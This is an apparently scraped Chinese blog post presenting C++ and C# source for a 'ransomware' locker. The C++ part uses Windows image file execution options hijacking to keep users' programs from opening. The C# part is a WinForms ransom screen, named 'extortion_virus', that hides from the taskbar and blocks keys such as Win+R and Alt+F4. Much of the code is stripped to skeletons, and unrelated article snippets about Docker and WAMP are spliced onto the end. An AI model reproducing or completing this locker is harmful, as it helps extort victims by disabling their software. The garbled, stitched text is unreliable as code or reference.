基於windows下的映像劫持實現「勒索病毒」

2021-08-27 16:00:39 字數 4427 閱讀 9471

.

##什麼是映像劫持?

關於映像劫持,我曾經在部落格中給大家講過,在此就不再闡述了。

附上文章傳送門:

##什麼是勒索病毒?

勒索病毒,是一種新型電腦病毒,主要以郵件、程式木馬、網頁掛馬的形式進行傳播。該病毒性質惡劣、危害極大,一旦感染將給使用者帶來無法估量的損失。這種病毒利用各種加密演算法對檔案進行加密,被感染者一般無法解密,必須拿到解密的私鑰才有可能破解。

而我們這裡,僅僅只是利用映像劫持技術,來實現使用者正常軟體無法開啟,從而實現勒索目的。

##c/c++實現映像劫持源**

#include "shlobj.h" 

#include #include #include #include #include #include #include #include using namespace std;

class hacker

private:

string path;

public:

listfilename;

private:

string getdesktoppath() //獲取桌面路徑

pshellmalloc->release();

}return string(szdir);

}private:

int getallgpxfilepathfromfolder(string path)

;strcpy(szfile, path.c_str());

strcat(szfile, "\\");

strcat(szfile, findfiledata.cfilename);

getallgpxfilepathfromfolder(szfile);

}}else

} while (findnextfile(hfind, &findfiledata));

findclose(hfind);

return 0;

}};void replacea_to_b(std::string& s, const std::string a, const std::string b)

}int main()

}for (list::iterator itor = one->filename.begin(); itor != one->filename.end(); itor++)

system("pause");

return 0;

}

#基於c#實現勒索病毒:

#####form1.designer.cs:

namespace extortion_virus

base.dispose(disposing);

}#region windows 窗體設計器生成的**

/// /// 設計器支援所需的方法 - 不要修改

/// 使用**編輯器修改此方法的內容。

///

private void initializecomponent()

#endregion

private system.windows.forms.picturebox picturebox1;

private system.windows.forms.label label1;

private system.windows.forms.label label2;

private system.windows.forms.label label3;

private system.windows.forms.label label4;

private system.windows.forms.button button1;

private system.componentmodel.backgroundworker backgroundworker1;}}

#####from1.cs:

using system;

using system.collections.generic;

using system.componentmodel;

using system.data;

using system.drawing;

using system.io;

using system.linq;

using system.text;

using system.threading.tasks;

using system.windows.forms;

namespace extortion_virus

private void form1_keydown(object sender, keyeventargs e)

if ((e.modifiers == keys.lwin || e.modifiers == keys.rwin) && e.modifiers == keys.r)

if (e.modifiers == keys.rwin || e.modifiers == keys.lwin)

if (e.modifiers == keys.alt && e.modifiers == keys.f4)

}private void button1_click(object sender, eventargs e)}}

#####form2.designer.cs

namespace extortion_virus

base.dispose(disposing);

}#region windows form designer generated code

/// /// required method for designer support - do not modify

/// the contents of this method with the code editor.

///

private void initializecomponent()

#endregion

private system.windows.forms.picturebox picturebox1;

private system.windows.forms.label label1;

private system.windows.forms.label label2;

private system.windows.forms.richtextbox richtextbox1;

private system.windows.forms.label label3;

private system.windows.forms.label label4;

private system.windows.forms.label label5;

private system.windows.forms.label label6;

private system.windows.forms.label label7;

private system.windows.forms.button button1;

private system.windows.forms.button button2;}}

#####from2.cs:

using system;

using system.collections.generic;

using system.componentmodel;

using system.data;

using system.drawing;

using system.linq;

using system.text;

using system.threading.tasks;

using system.windows.forms;

namespace extortion_virus

private void button1_click(object sender, eventargs e)

private void button2_click(object sender, eventargs e)

else }}

}

###**執行後效果圖

###這裡由於c#比c++開發快捷,故使用了c#的winfrom。在此我只設定了winfrom程式在工作列隱藏,並不允許調整大小,刪除關閉安全。檢測使用者按鍵。

###如果需要更好的效果,可以把兩個程式合在一起,使用mfc或者qt來實現乙個勒索病毒的效果。

關於病毒的映像劫持

當前的木馬 病毒似乎比較鍾情於 映像劫持 通過其達到欺騙系統和防毒軟體,進而絕殺安全軟體接管系統。小水最近就遇到這種型別的木馬病毒,下面把自己有關映像劫持的學習心得寫下來與大家交流。一 原理 所謂的映像劫持 ifeo 就是image file execution options 它位於登錄檔的 hk...

windows下基於Docker安裝caffe

windows下安裝caffe,各種依賴關係較為複雜,使用docker安裝較為方便。一 docker安裝 二 caffe安裝 可以使用已經編譯好的官方的image,開啟docker quickstart terminal,輸入 要在本地自己build乙個image,則需要輸入如下命令 docker ...

基於windows下wamp多網域名稱的配置操作方法

本文將詳細介紹windows下wamp多網域名稱的配置方法 修改hosts檔案 hosts檔案的位置 系統盤 windows system32 drivers etc 開啟hosts,新加一條記錄 127.0.0.1 php.xiaohuochai.com 啟動apache虛擬主機功能 開啟apac...